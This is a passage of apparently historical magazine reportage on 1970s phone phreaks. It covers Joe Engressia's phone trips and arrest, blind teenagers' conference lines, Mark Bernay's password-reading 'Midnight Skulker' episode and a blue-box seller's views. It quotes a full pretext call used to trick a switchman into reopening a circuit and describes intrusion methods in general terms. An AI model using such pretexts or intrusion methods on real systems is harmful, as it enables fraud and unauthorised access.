making fun of me because of my fat ass, which of course I do have, it's my physical fatness program, but I don't like to hear it every day, and if I can't phone trip and I can't phone phreak, I can't imagine what I'd do, I've been devoting three quarters of my life to it. "I moved to Memphis because I wanted to be on my own as well as because it has a Number 5 crossbar switching system and some interesting little independent phone-company districts nearby and so far they don't seem to know who I am so I can go on phone tripping, and for me phone tripping is just as important as phone phreaking." Phone tripping, Joe explains, begins with calling up a central-office switch room. He tells the switchman in a polite earnest voice that he's a blind college student interested in telephones, and could he perhaps have a guided tour of the switching station? Each step of the tour Joe likes to touch and feel relays, caress switching circuits, switchboards, crossbar arrangements. So when Joe Engressia phone phreaks he feels his way through the circuitry of the country garden of forking paths, he feels switches shift, relays shunt, crossbars swivel, tandems engage and disengage even as he hears -- with perfect pitch -- his M-F pulses make the entire Bell system dance to his tune. Just one month ago Joe took all his savings out of his bank and left home, over the emotional protests of his mother. "I ran away from home almost," he likes to say. Joe found a small apartment house on Union Avenue and began making phone trips. He'd take a bus a hundred miles south in Mississippi to see some old-fashioned Bell equipment still in use in several states, which had been puzzling. He'd take a bus three hundred miles to Charlotte, North Carolina, to look at some brand-new experimental equipment. He hired a taxi to drive him twelve miles to a suburb to tour the office of a small phone company with some interesting idiosyncrasies in its routing system. He was having the time of his life, he said, the most freedom and pleasure he had known. In that month he had done very little long-distance phone phreaking from his own phone. He had begun to apply for a job with the phone company, he told me, and he wanted to stay away from anything illegal. "Any kind of job will do, anything as menial as the most lowly operator. That's probably all they'd give me because I'm blind. Even though I probably know more than most switchmen. But that's okay. I want to work for Ma Bell. I don't hate Ma Bell the way Gilbertson and some phone phreaks do. I don't want to screw Ma Bell. With me it's the pleasure of pure knowledge. There's something beautiful about the system when you know it intimately the way I do. But I don't know how much they know about me here. I have a very intuitive feel for the condition of the line I'm on, and I think they're monitoring me off and on lately, but I haven't been doing much illegal. I have to make a few calls to switchmen once in a while which aren't strictly legal, and once I took an acid trip and was having these auditory hallucinations as if I were trapped and these planes were dive-bombing me, and all of sudden I had to phone phreak out of there. For some reason I had to call Kansas City, but that's all." A Warning Is Delivered At this point -- one o'clock in my time zone -- a loud knock on my motel-room door interrupts our conversation. Outside the door I find a uniformed security guard who informs me that there has been an "emergency phone call" for me while I have been on the line and that the front desk has sent him up to let me know. Two seconds after I say good-bye to Joe and hang up, the phone rings. "Who were you talking to?" the agitated voice demands. The voice belongs to Captain Crunch. "I called because I decided to warn you of something. I decided to warn you to be careful. I don't want this information you get to get to the radical underground. I don't want it to get into the wrong hands. What would you say if I told you it's possible for three phone phreaks to saturate the phone system of the nation. Saturate it. Busy it out. All of it. I know how to do this. I'm not gonna tell. A friend of mine has already saturated the trunks between Seattle and New York. He did it with a computerized M-F-er hitched into a special Manitoba exchange. But there are other, easier ways to do it." Just three people? I ask. How is that possible? "Have you ever heard of the long-lines guard frequency? Do you know about stacking tandems with 17 and 2600? Well, I'd advise you to find out about it. I'm not gonna tell you. But whatever you do, don't let this get into the hands of the radical underground." (Later Gilbertson, the inventor, confessed that while he had always been skeptical about the Captain's claim of the sabotage potential of trunk-tying phone phreaks, he had recently heard certain demonstrations which convinced him the Captain was not speaking idly. "I think it might take more than three people, depending on how many machines like Captain Crunch's were available. But even though the Captain sounds a little weird, he generally turns out to know what he's talking about.") "You know," Captain Crunch continues in his admonitory tone, "you know the younger phone phreaks call Moscow all the time. Suppose everybody were to call Moscow. I'm no right-winger. But I value my life. I don't want the Commies coming over and dropping a bomb on my head. That's why I say you've got to be careful about who gets this information." The Captain suddenly shifts into a diatribe against those phone phreaks who don't like the phone company. "They don't understand, but Ma Bell knows everything they do. Ma Bell knows. Listen, is this line hot? I just heard someone tap in. I'm not paranoid, but I can detect things like that. Well, even if it is, they know that I know that they know that I have a bulk eraser. I'm very clean." The Captain pauses, evidently torn between wanting to prove to the phone-company monitors that he does nothing illegal, and the desire to impress Ma Bell with his prowess. "Ma Bell knows how good I am. And I am quite good. I can detect reversals, tandem switching, everything that goes on a line. I have relative pitch now. Do you know what that means? My ears are a $20,000 piece of equipment. With my ears I can detect things they can't hear with their equipment. I've had employment problems. I've lost jobs. But I want to show Ma Bell how good I am. I don't want to screw her, I want to work for her. I want to do good for her. I want to help her get rid of her flaws and become perfect. That's my number-one goal in life now." The Captain concludes his warnings and tells me he has to be going. "I've got a little action lined up for tonight," he explains and hangs up. Before I hang up for the night, I call Joe Engressia back. He reports that his tormentor has finally gone to sleep -- "He's not blind drunk, that's the way I get, ahem, yes; but you might say he's in a drunken stupor." I make a date to visit Joe in Memphis in two days. A Phone Phreak Call Takes Care of Business The next morning I attend a gathering of four phone phreaks in ----- (a California suburb). The gathering takes place in a comfortable split-level home in an upper-middle-class subdivision. Heaped on the kitchen table are the portable cassette recorders, M-F cassettes, phone patches, and line ties of the four phone phreaks present. On the kitchen counter next to the telephone is a shoe-box-size blue box with thirteen large toggle switches for the tones. The parents of the host phone phreak, Ralph, who is blind, stay in the living room with their sighted children. They are not sure exactly what Ralph and his friends do with the phone or if it's strictly legal, but he is blind and they are pleased he has a hobby which keeps him busy. The group has been working at reestablishing the historic "2111" conference, reopening some toll-free loops, and trying to discover the dimensions of what seem to be new initiatives against phone phreaks by phone-company security agents. It is not long before I get a chance to see, to hear, Randy at work. Randy is known among the phone phreaks as perhaps the finest con man in the game. Randy is blind. He is pale, soft and pear-shaped, he wears baggy pants and a wrinkly nylon white sport shirt, pushes his head forward from hunched shoulders somewhat like a turtle inching out of its shell. His eyes wander, crossing and recrossing, and his forehead is somewhat pimply. He is only sixteen years old. But when Randy starts speaking into a telephone mouthpiece his voice becomes so stunningly authoritative it is necessary to look again to convince yourself it comes from a chubby adolescent Randy. Imagine the voice of a crack oil-rig foreman, a tough, sharp, weather-beaten Marlboro man of forty. Imagine the voice of a brilliant performance-fund gunslinger explaining how he beats the Dow Jones by thirty percent. Then imagine a voice that could make those two sound like Stepin Fetchit. That is sixteen-year-old Randy's voice. He is speaking to a switchman in Detroit. The phone company in Detroit had closed up two toll-free loop pairs for no apparent reason, although heavy use by phone phreaks all over the country may have been detected. Randy is telling the switchman how to open up the loop and make it free again: "How are you, buddy. Yeah. I'm on the board in here in Tulsa, Oklahoma, and we've been trying to run some tests on your loop-arounds and we find'em busied out on both sides.... Yeah, we've been getting a 'BY' on them, what d'ya say, can you drop cards on 'em? Do you have 08 on your number group? Oh that's okay, we've had this trouble before, we may have to go after the circuit. Here lemme give 'em to you: your frame is 05, vertical group 03, horizontal 5, vertical file 3. Yeah, we'll hang on here.... Okay, found it? Good. Right, yeah, we'd like to clear that busy out. Right. All you have to do is look for your key on the mounting plate, it's in your miscellaneous trunk frame. Okay? Right. Now pull your key from NOR over the LCT. Yeah. I don't know why that happened, but we've been having trouble with that one. Okay. Thanks a lot fella. Be seein' ya." Randy hangs up, reports that the switchman was a little inexperienced with the loop-around circuits on the miscellaneous trunk frame, but that the loop has been returned to its free-call status. Delighted, phone phreak Ed returns the pair of numbers to the active-status column in his directory. Ed is a superb and painstaking researcher. With almost Talmudic thoroughness he will trace tendrils of hints through soft-wired mazes of intervening phone-company circuitry back through complex linkages of switching relays to find the location and identity of just one toll-free loop. He spends hours and hours, every day, doing this sort of thing. He has somehow compiled a directory of eight hundred "Band-six in-WATS numbers" located in over forty states. Band-six in-WATS numbers are the big 800 numbers -- the ones that can be dialed into free from anywhere in the country. Ed the researcher, a nineteen-year-old engineering student, is also a superb technician. He put together his own working blue box from scratch at age seventeen. (He is sighted.) This evening after distributing the latest issue of his in-WATS directory (which has been typed into Braille for the blind phone phreaks), he announces he has made a major new breakthrough: "I finally tested it and it works, perfectly. I've got this switching matrix which converts any touch-tone phone into an M-F-er." The tones you hear in touch-tone phones are not the M-F tones that operate the long-distance switching system. Phone phreaks believe AT&T. had deliberately equipped touch tones with a different set of frequencies to avoid putting the six master M-F tones in the hands of every touch-tone owner. Ed's complex switching matrix puts the six master tones, in effect put a blue box, in the hands of every touch-tone owner. Ed shows me pages of schematics, specifications and parts lists. "It's not easy to build, but everything here is in the Heathkit catalog." Ed asks Ralph what progress he has made in his attempts to reestablish a long-term open conference line for phone phreaks. The last big conference -- the historic "2111" conference -- had been arranged through an unused Telex test-board trunk somewhere in the innards of a 4A switching machine in Vancouver, Canada. For months phone phreaks could M-F their way into Vancouver, beep out 604 (the Vancouver area code) and then beep out 2111 (the internal phone-company code for Telex testing), and find themselves at any time, day or night, on an open wire talking with an array of phone phreaks from coast to coast, operators from Bermuda, Tokyo and London who are phone-phreak sympathizers, and miscellaneous guests and technical experts. The conference was a massive exchange of information. Phone phreaks picked each other's brains clean, then developed new ways to pick the phone company's brains clean. Ralph gave M F Boogies concerts with his home-entertainment-type electric organ, Captain Crunch demonstrated his round-the-world prowess with his notorious computerized unit and dropped leering hints of the "action" he was getting with his girl friends. (The Captain lives out or pretends to live out several kinds of fantasies to the gossipy delight of the blind phone phreaks who urge him on to further triumphs on behalf of all of them.) The somewhat rowdy Northwest phone-phreak crowd let their bitter internal feud spill over into the peaceable conference line, escalating shortly into guerrilla warfare; Carl the East Coast international tone relations expert demonstrated newly opened direct M-F routes to central offices on the island of Bahrein in the Persian Gulf, introduced a new phone-phreak friend of his in Pretoria, and explained the technical operation of the new Oakland-to Vietnam linkages. (Many phone phreaks pick up spending money by M-F-ing calls from relatives to Vietnam GIs charging $5 for a whole hour of trans-Pacific conversation.) Day and night the conference line was never dead. Blind phone phreaks all over the country, lonely and isolated in homes filled with active sighted brothers and sisters, or trapped with slow and unimaginative blind kids in straitjacket schools for the blind, knew that no matter how late it got they could dial up the conference and find instant electronic communion with two or three other blind kids awake over on the other side of America. Talking together on a phone hookup, the blind phone phreaks say, is not much different from being there together. Physically, there was nothing more than a two-inch-square wafer of titanium inside a vast machine on Vancouver Island. For the blind kids >there< meant an exhilarating feeling of being in touch, through a kind of skill and magic which was peculiarly their own. Last April 1, however, the long Vancouver Conference was shut off. The phone phreaks knew it was coming. Vancouver was in the process of converting from a step-by-step system to a 4A machine and the 2111 Telex circuit was to be wiped out in the process. The phone phreaks learned the actual day on which the conference would be erased about a week ahead of time over the phone company's internal-news-and-shop-talk recording. For the next frantic seven days every phone phreak in America was on and off the 2111 conference twenty-four hours a day. Phone phreaks who were just learning the game or didn't have M-F capability were boosted up to the conference by more experienced phreaks so they could get a glimpse of what it was like before it disappeared. Top phone phreaks searched distant area codes for new conference possibilities without success. Finally in the early morning of April 1, the end came. "I could feel it coming a couple hours before midnight," Ralph remembers. "You could feel something going on in the lines. Some static began showing up, then some whistling wheezing sound. Then there were breaks. Some people got cut off and called right back in, but after a while some people were finding they were cut off and couldn't get back in at all. It was terrible. I lost it about one a.m., but managed to slip in again and stay on until the thing died... I think it was about four in the morning. There were four of us still hanging on when the conference disappeared into nowhere for good. We all tried to M-F up to it again of course, but we got silent termination. There was nothing there." The Legendary Mark Bernay Turns Out To Be "The Midnight Skulker" Mark Bernay. I had come across that name before. It was on Gilbertson's select list of phone phreaks. The California phone phreaks had spoken of a mysterious Mark Bernay as perhaps the first and oldest phone phreak on the West Coast. And in fact almost every phone phreak in the West can trace his origins either directly to Mark Bernay or to a disciple of Mark Bernay. It seems that five years ago this Mark Bernay (a pseudonym he chose for himself) began traveling up and down the West Coast pasting tiny stickers in phone books all along his way. The stickers read something like "Want to hear an interesting tape recording? Call these numbers." The numbers that followed were toll-free loop-around pairs. When one of the curious called one of the numbers he would hear a tape recording pre-hooked into the loop by Bernay which explained the use of loop-around pairs, gave the numbers of several more, and ended by telling the caller, "At six o'clock tonight this recording will stop and you and your friends can try it out. Have fun." "I was disappointed by the response at first," Bernay told me, when I finally reached him at one of his many numbers and he had dispensed with the usual "I never do anything illegal" formalities which experienced phone phreaks open most conversations. "I went all over the coast with these stickers not only on pay phones, but I'd throw them in front of high schools in the middle of the night, I'd leave them unobtrusively in candy stores, scatter them on main streets of small towns. At first hardly anyone bothered to try it out. I would listen in for hours and hours after six o'clock and no one came on. I couldn't figure out why people wouldn't be interested. Finally these two girls in Oregon tried it out and told all their friends and suddenly it began to spread." Before his Johny Appleseed trip Bernay had already gathered a sizable group of early pre-blue-box phone phreaks together on loop-arounds in Los Angeles. Bernay does not claim credit for the original discovery of the loop-around numbers. He attributes the discovery to an eighteen-year-old reform school kid in Long Beach whose name he forgets and who, he says, "just disappeared one day." When Bernay himself discovered loop-arounds independently, from clues in his readings in old issues of the Automatic Electric Technical Journal, he found dozens of the reform-school kid's friends already using them. However, it was one of Bernay's disciples in Seattle that introduced phone phreaking to blind kids. The Seattle kid who learned about loops through Bernay's recording told a blind friend, the blind kid taught the secret to his friends at a winter camp for blind kids in Los Angeles. When the camp session was over these kids took the secret back to towns all over the West. This is how the original blind kids became phone phreaks. For them, for most phone phreaks in general, it was the discovery of the possibilities of loop-arounds which led them on to far more serious and sophisticated phone-phreak methods, and which gave them a medium for sharing their discoveries. A year later a blind kid who moved back east brought the technique to a blind kids' summer camp in Vermont, which spread it along the East Coast. All from a Mark Bernay sticker. Bernay, who is nearly thirty years old now, got his start when he was fifteen and his family moved into an L.A. suburb serviced by General Telephone and Electronics equipment. He became fascinated with the differences between Bell and G.T.&E. equipment. He learned he could make interesting things happen by carefully timed clicks with the disengage button. He learned to interpret subtle differences in the array of clicks, whirrs and kachinks he could hear on his lines. He learned he could shift himself around the switching relays of the L.A. area code in a not-too-predictable fashion by interspersing his own hook-switch clicks with the clicks within the line. (Independent phone companies -- there are nineteen hundred of them still left, most of them tiny island principalities in Ma Bell's vast empire -- have always been favorites with phone phreaks, first as learning tools, then as Archimedes platforms from which to manipulate the huge Bell system. A phone phreak in Bell territory will often M-F himself into an independent's switching system, with switching idiosyncrasies which can give him marvelous leverage over the Bell System. "I have a real affection for Automatic Electric Equipment," Bernay told me. "There are a lot of things you can play with. Things break down in interesting ways." Shortly after Bernay graduated from college (with a double major in chemistry and philosophy), he graduated from phreaking around with G.T.&E. to the Bell System itself, and made his legendary sticker-pasting journey north along the coast, settling finally in Northwest Pacific Bell territory. He discovered that if Bell does not break down as interestingly as G.T.&E., it nevertheless offers a lot of "things to play with." Bernay learned to play with blue boxes. He established his own personal switchboard and phone-phreak research laboratory complex. He continued his phone-phreak evangelism with ongoing sticker campaigns. He set up two recording numbers, one with instructions for beginning phone phreaks, the other with latest news and technical developments (along with some advanced instruction) gathered from sources all over the country. These days, Bernay told me, he had gone beyond phone-phreaking itself. "Lately I've been enjoying playing with computers more than playing with phones. My personal thing in computers is just like with phones, I guess -- the kick is in finding out how to beat the system, how to get at things I'm not supposed to know about, how to do things with the system that I'm not supposed to be able to do." As a matter of fact, Bernay told me, he had just been fired from his computer-programming job for doing things he was not supposed to be able to do. He had been working with a huge time-sharing computer owned by a large corporation but shared by many others. Access to the computer was limited to those programmers and corporations that had been assigned certain passwords. And each password restricted its user to access to only the one section of the computer cordoned off from its own information storager. The password system prevented companies and individuals from stealing each other's information. "I figured out how to write a program that would let me read everyone else's password," Bernay reports. "I began playing around with passwords. I began letting the people who used the computer know, in subtle ways, that I knew their passwords. I began dropping notes to the computer supervisors with hints that I knew what I know. I signed them 'The Midnight Skulker.' I kept getting cleverer and cleverer with my messages and devising ways of showing them what I could do. I'm sure they couldn't imagine I could do the things I was showing them. But they never responded to me. Every once in a while they'd change the passwords, but I found out how to discover what the new ones were, and I let them know. But they never responded directly to the Midnight Skulker. I even finally designed a program which they could use to prevent my program from finding out what it did. In effect I told them how to wipe me out, The Midnight Skulker. It was a very clever program. I started leaving clues about myself. I wanted them to try and use it and then try to come up with something to get around that and reappear again. But they wouldn't play. I wanted to get caught. I mean I didn't want to get caught personally, but I wanted them to notice me and admit that they noticed me. I wanted them to attempt to respond, maybe in some interesting way." Finally the computer managers became concerned enough about the threat of information-stealing to respond. However, instead of using The Midnight Skulker's own elegant self-destruct program, they called in their security personnel, interrogated everyone, found an informer to identify Bernay as The Midnight Skulker, and fired him. "At first the security people advised the company to hire me full-time to search out other flaws and discover other computer freaks. I might have liked that. But I probably would have turned into a double double agent rather than the double agent they wanted. I might have resurrected The Midnight Skulker and tried to catch myself. Who knows? Anyway, the higher-ups turned the whole idea down." You Can Tap the F.B.I.'s Crime Control Computer in the Comfort of Your Own Home, Perhaps. Computer freaking may be the wave of the future. It suits the phone-phreak sensibility perfectly. Gilbertson, the blue-box inventor and a lifelong phone phreak, has also gone on from phone-phreaking to computer-freaking. Before he got into the blue-box business Gilbertson, who is a highly skilled programmer, devised programs for international currency arbitrage. But he began playing with computers in earnest when he learned he could use his blue box in tandem with the computer terminal installed in his apartment by the instrumentation firm he worked for. The print-out terminal and keyboard was equipped with acoustical coupling, so that by coupling his little ivory Princess phone to the terminal and then coupling his blue box on that, he could M-F his way into other computers with complete anonymity, and without charge; program and re-program them at will; feed them false or misleading information; tap and steal from them. He explained to me that he taps computers by busying out all the lines, then going into a verification trunk, listening into the passwords and instructions one of the time sharers uses, and them M-F-ing in and imitating them. He believes it would not be impossible to creep into the F.B.I's crime control computer through a local police computer terminal and phreak around with the F.B.I.'s memory banks. He claims he has succeeded in re-programming a certain huge institutional computer in such a way that it has cordoned off an entire section of its circuitry for his personal use, and at the same time conceals that arrangement from anyone else's notice. I have been unable to verify this claim. Like Captain Crunch, like Alexander Graham Bell (pseudonym of a disgruntled-looking East Coast engineer who claims to have invented the black box and now sells black and blue boxes to gamblers and radical heavies), like most phone phreaks, Gilbertson began his career trying to rip off pay phones as a teenager. Figure them out, then rip them off. Getting his dime back from the pay phone is the phone phreak's first thrilling rite of passage. After learning the usual eighteen different ways of getting his dime back, Gilbertson learned how to make master keys to coin-phone cash boxes, and get everyone else's dimes back. He stole some phone-company equipment and put together his own home switchboard with it. He learned to make a simple "bread-box" device, of the kind used by bookies in the Thirties (bookie gives a number to his betting clients; the phone with that number is installed in some widow lady's apartment, but is rigged to ring in the bookie's shop across town, cops trace big betting number and find nothing but the widow). Not long after that afternoon in 1968 when, deep in the stacks of an engineering library, he came across a technical journal with the phone tone frequencies and rushed off to make his first blue box, not long after that Gilbertson abandoned a very promising career in physical chemistry and began selling blue boxes for $1,500 apiece. "I had to leave physical chemistry. I just ran out of interesting things to learn," he told me one evening. We had been talking in the apartment of the man who served as the link between Gilbertson and the syndicate in arranging the big $300,000 blue-box deal which fell through because of legal trouble. There has been some smoking. "No more interesting things to learn," he continues. "Physical chemistry turns out to be a sick subject when you take it to its highest level. I don't know. I don't think I could explain to you how it's sick. You have to be there. But you get, I don't know, a false feeling of omnipotence. I suppose it's like phone-phreaking that way. This huge thing is there. This whole system. And there are holes in it and you slip into them like Alice and you're pretending you're doing something you're actually not, or at least it's no longer you that's doing what you thought you were doing. It's all Lewis Carroll. Physical chemistry and phone-phreaking. That's why you have these phone-phreak pseudonyms like The Cheshire Cat, the Red King, and The Snark. But there's something about phone-phreaking that you don't find in physical chemistry." He looks up at me: "Did you ever steal anything?" "Well yes, I..." "Then you know! You know the rush you get. It's not just knowledge, like physical chemistry. It's forbidden knowledge. You know. You can learn about anything under the sun and be bored to death with it. But the idea that it's illegal. Look: you can be small and mobile and smart and you're ripping off somebody large and powerful and very dangerous." People like Gilbertson and Alexander Graham Bell are always talking about ripping off the phone company and screwing Ma Bell. But if they were shown a single button and told that by pushing it they could turn the entire circuitry of A.T.&T. into molten puddles, they probably wouldn't push it. The disgruntled-inventor phone phreak needs the phone system the way the lapsed Catholic needs the Church, the way Satan needs a God, the way The Midnight Skulker needed, more than anything else, response. Later that evening Gilbertson finished telling me how delighted he was at the flood of blue boxes spreading throughout the country, how delighted he was to know that "this time they're really screwed." He suddenly shifted gears. "Of course. I do have this love/hate thing about Ma Bell. In a way I almost like the phone company. I guess I'd be very sad if they were to disintegrate. In a way it's just that after having been so good they turn out to have these things wrong with them. It's those flaws that allow me to get in and mess with them, but I don't know. There's something about it that gets to you and makes you want to get to it, you know." I ask him what happens when he runs out of interesting, forbidden things to learn about the phone system. "I don't know, maybe I'd go to work for them for a while." "In security even?" "I'd do it, sure. I just as soon play -- I'd just as soon work on either side." "Even figuring out how to trap phone phreaks? I said, recalling Mark Bernay's game." "Yes, that might be interesting. Yes, I could figure out how to outwit the phone phreaks. Of course if I got too good at it, it might become boring again. Then I'd have to hope the phone phreaks got much better and outsmarted me for a while. That would move the quality of the game up one level. I might even have to help them out, you know, 'Well, kids, I wouldn't want this to get around but did you ever think of -- ?' I could keep it going at higher and higher levels forever." The dealer speaks up for the first time. He has been staring at the soft blinking patterns of light and colors on the translucent tiled wall facing him. (Actually there are no patterns: the color and illumination of every tile is determined by a computerized random-number generator designed by Gilbertson which insures that there can be no meaning to any sequence of events in the tiles.) "Those are nice games you're talking about," says the dealer to his friend. "But I wouldn't mind seeing them screwed. A telephone isn't private anymore. You can't say anything you really want to say on a telephone or you have to go through that paranoid bullshit. 'Is it cool to talk on the phone?' I mean, even if it is cool, if you have to ask 'Is it cool,' then it isn't cool. You know. 'Is it cool,' then it isn't cool. You know. Like those blind kids, people are going to start putting together their own private telephone companies if they want to really talk. And you know what else. You don't hear silences on the phone anymore. They've got this time-sharing thing on long-distance lines where you make a pause and they snip out that piece of time and use it to carry part of somebody else's conversation.Instead of a pause, where somebody's maybe breathing or sighing, you get this blank hole and you only start hearing again when someone says a word and even the beginning of the word is clipped off. Silences don't count -- you're paying for them, but they take them away from you. It's not cool to talk and you can't hear someone when they don't talk. What the hell good is the phone? I wouldn't mind seeing them totally screwed." The Big Memphis Bust Joe Engressia never wanted to screw Ma Bell. His dream had always been to work for her. The day I visited Joe in his small apartment on Union Avenue in Memphis, he was upset about another setback in his application for a telephone job. "They're stalling on it. I got a letter today telling me they'd have to postpone the interview I requested again. My landlord read it for me. They gave me some runaround about wanting papers on my rehabilitation status but I think there's something else going on." When I switched on the 40-watt bulb in Joe's room -- he sometimes forgets when he has guests -- it looked as if there was enough telephone hardware to start a small phone company of his own. There is one phone on top of his desk, one phone sitting in an open drawer beneath the desk top. Next to the desk-top phone is a cigar-box-size M-F device with big toggle switches, and next to that is some kind of switching and coupling device with jacks and alligator plugs hanging loose. Next to that is a Braille typewriter. On the floor next to the desk, lying upside down like a dead tortoise, is the half-gutted body of an old black standard phone. Across the room on a torn and dusty couch are two more phones, one of them a touch-tone model; two tape recorders; a heap of phone patches and cassettes, and a life-size toy telephone. Our conversation is interrupted every ten minutes by phone phreaks from all over the country ringing Joe on just about every piece of equipment but the toy phone and the Braille typewriter. One fourteen-year-old blind kid from Connecticut calls up and tells Joe he's got a girl friend. He wants to talk to Joe about girl friends. Joe says they'll talk later in the evening when they can be alone on the line. Joe draws a deep breath, whistles him off the air with an earsplitting 2600-cycle whistle. Joe is pleased to get the calls but he looked worried and preoccupied that evening, his brow constantly furrowed over his dark wandering eyes. In addition to the phone-company stall, he has just learned that his apartment house is due to be demolished in sixty days for urban renewal. For all its shabbiness, the Union Avenue apartment house has been Joe's first home-of-his-own and he's worried that he may not find another before this one is demolished. But what really bothers Joe is that switchmen haven't been listening to him. "I've been doing some checking on 800 numbers lately, and I've discovered that certain 800 numbers in New Hampshire couldn't be reached from Missouri and Kansas. Now it may sound like a small thing, but I don't like to see sloppy work; it makes me feel bad about the lines. So I've been calling up switching offices and reporting it, but they haven't corrected it. I called them up for the third time today and instead of checking they just got mad. Well, that gets me mad. I mean, I do try to help them. There's something about them I can't understand -- you want to help them and they just try to say you're defrauding them." It is Sunday evening and Joe invites me to join him for dinner at a Holiday Inn. Frequently on Sunday evening Joe takes some of his welfare money, calls a cab, and treats himself to a steak dinner at one of Memphis' thirteen Holiday Inns. (Memphis is the headquarters of Holiday Inn. Holiday Inns have been a favorite for Joe ever since he made his first solo phone trip to a Bell switching office in Jacksonville, Florida, and stayed in the Holiday Inn there. He likes to stay at Holiday Inns, he explains, because they represent freedom to him and because the rooms are arranged the same all over the country so he knows that any Holiday Inn room is familiar territory to him. Just like any telephone.) Over steaks in the Pinnacle Restaurant of the Holiday Inn Medical Center on Madison Avenue in Memphis, Joe tells me the highlights of his life as a phone phreak. At age seven, Joe learned his first phone trick. A mean baby-sitter, tired of listening to little Joe play with the phone as he always did, constantly, put a lock on the phone dial. "I got so mad. When there's a phone sitting there and I can't use it... so I started getting mad and banging the receiver up and down. I noticed I banged it once and it dialed one. Well, then I tried banging it twice...." In a few minutes Joe learned how to dial by pressing the hook switch at the right time. "I was so excited I remember going 'whoo whoo' and beat a box down on the floor." At age eight Joe learned about whistling. "I was listening to some intercept non working-number recording in L.A.- I was calling L.A. as far back as that, but I'd mainly dial non working numbers because there was no charge, and I'd listen to these recordings all day. Well, I was whistling 'cause listening to these recordings can be boring after a while even if they are from L.A., and all of a sudden, in the middle of whistling, the recording clicked off. I fiddled around whistling some more, and the same thing happened. So I called up the switch room and said, 'I'm Joe. I'm eight years old and I want to know why when I whistle this tune the line clicks off.' He tried to explain it to me, but it was a little too technical at the time. I went on learning. That was a thing nobody was going to stop me from doing. The phones were my life, and I was going to pay any price to keep on learning. I knew I could go to jail. But I had to do what I had to do to keep on learning." The phone is ringing when we walk back into Joe's apartment on Union Avenue. It is Captain Crunch. The Captain has been following me around by phone, calling up everywhere I go with additional bits of advice and explanation for me and whatever phone phreak I happen to be visiting. This time the Captain reports he is calling from what he describes as "my hideaway high up in the Sierra Nevada." He pulses out lusty salvos of M-F and tells Joe he is about to "go out and get a little action tonight. Do some phreaking of another kind, if you know what I mean." Joe chuckles. The Captain then tells me to make sure I understand that what he told me about tying up the nation's phone lines was true, but that he and the phone phreaks he knew never used the technique for sabotage. They only learned the technique to help the phone company. "We do a lot of troubleshooting for them. Like this New Hampshire/Missouri WATS-line flaw I've been screaming about. We help them more than they know." After we say good-bye to the Captain and Joe whistles him off the line, Joe tells me about a disturbing dream he had the night before: "I had been caught and they were taking me to a prison. It was a long trip. They were taking me to a prison a long long way away. And we stopped at a Holiday Inn and it was my last night ever using the phone and I was crying and crying, and the lady at the Holiday Inn said, 'Gosh, honey, you should never be sad at a Holiday Inn. You should always be happy here. Especially since it's your last night.' And that just made it worse and I was sobbing so much I couldn't stand it." Two weeks after I left Joe Engressia's apartment, phone-company security agents and Memphis police broke into it. Armed with a warrant, which they left pinned to a wall, they confiscated every piece of equipment in the room, including his toy telephone. Joe was placed under arrest and taken to the city jail where he was forced to spend the night since he had no money and knew no one in Memphis to call. It is not clear who told Joe what that night, but someone told him that the phone company had an open-and-shut case against him because of revelations of illegal activity he had made to a phone-company undercover agent. By morning Joe had become convinced that the reporter from Esquire, with whom he had spoken two weeks ago, was the undercover agent. He probably had ugly thoughts about someone he couldn't see gaining his confidence, listening to him talk about his personal obsessions and dreams, while planning all the while to lock him up. "I really thought he was a reporter," Engressia told the Memphis Press-Seminar. "I told him everything...." Feeling betrayed, Joe proceeded to confess everything to the press and police. As it turns out, the phone company did use an undercover agent to trap Joe, although it was not the Esquire reporter. Ironically, security agents were alerted and began to compile a case against Joe because of one of his acts of love for the system: Joe had called an internal service department to report that he had located a group of defective long-distance trunks, and to complain again about the New Hampshire/Missouri WATS problem. Joe always liked Ma Bell's lines to be clean and responsive. A suspicious switchman reported Joe to the security agents who discovered that Joe had never had a long-distance call charged to his name. Then the security agents learned that Joe was planning one of his phone trips to a local switching office. The security people planted one of their agents in the switching office. He posed as a student switchman and followed Joe around on a tour. He was extremely friendly and helpful to Joe, leading him around the office by the arm. When the tour was over he offered Joe a ride back to his apartment house. On the way he asked Joe -- one tech man to another -- about "those blue boxers" he'd heard about. Joe talked about them freely, talked about his blue box freely, and about all the other things he could do with the phones. The next day the phone-company security agents slapped a monitoring tape on Joe's line, which eventually picked up an illegal call. Then they applied for the search warrant and broke in. In court Joe pleaded not guilty to possession of a blue box and theft of service. A sympathetic judge reduced the charges to malicious mischief and found him guilty on that count, sentenced him to two thirty-day sentences to be served concurrently and then suspended the sentence on condition that Joe promise never to play with phones again. Joe promised, but the phone company refused to restore his service. For two weeks after the trial Joe could not be reached except through the pay phone at his apartment house, and the landlord screened all calls for him. Phone-phreak Carl managed to get through to Joe after the trial, and reported that Joe sounded crushed by the whole affair. "What I'm worried about," Carl told me, "is that Joe means it this time. The promise. That he'll never phone-phreak again. That's what he told me, that he's given up phone-phreaking for good. I mean his entire life. He says he knows they're going to be watching him so closely for the rest of his life he'll never be able to make a move without going straight to jail. He sounded very broken up by the whole experience of being in jail. It was awful to hear him talk that way. I don't know. I hope maybe he had to sound that way. Over the phone, you know." He reports that the entire phone-phreak underground is up in arms over the phone company's treatment of Joe. "All the while Joe had his hopes pinned on his application for a phone-company job, they were stringing him along getting ready to bust him. That gets me mad. Joe spent most of his time helping them out. The bastards. They think they can use him as an example. All of sudden they're harassing us on the coast. Agents are jumping up on our lines. They just busted ------'s mute yesterday and ripped out his lines. But no matter what Joe does, I don't think we're going to take this lying down." Two weeks later my phone rings and about eight phone phreaks in succession say hello from about eight different places in the country, among them Carl, Ed, and Captain Crunch. A nationwide phone-phreak conference line has been reestablished through a switching machine in --------, with the cooperation of a disgruntled switchman. "We have a special guest with us today," Carl tells me. The next voice I hear is Joe's. He reports happily that he has just moved to a place called Millington, Tennessee, fifteen miles outside of Memphis, where he has been hired as a telephone-set repairman by a small independent phone company. Someday he hopes to be an equipment troubleshooter. "It's the kind of job I dreamed about. They found out about me from the publicity surrounding the trial. Maybe Ma Bell did me a favor busting me. I'll have telephones in my hands all day long." "You know the expression, 'Don't get mad, get even'?" phone-phreak Carl asked me. "Well, I think they're going to be very sorry about what they did to Joe and what they're trying to do to us."

Back To List

Back To Home Page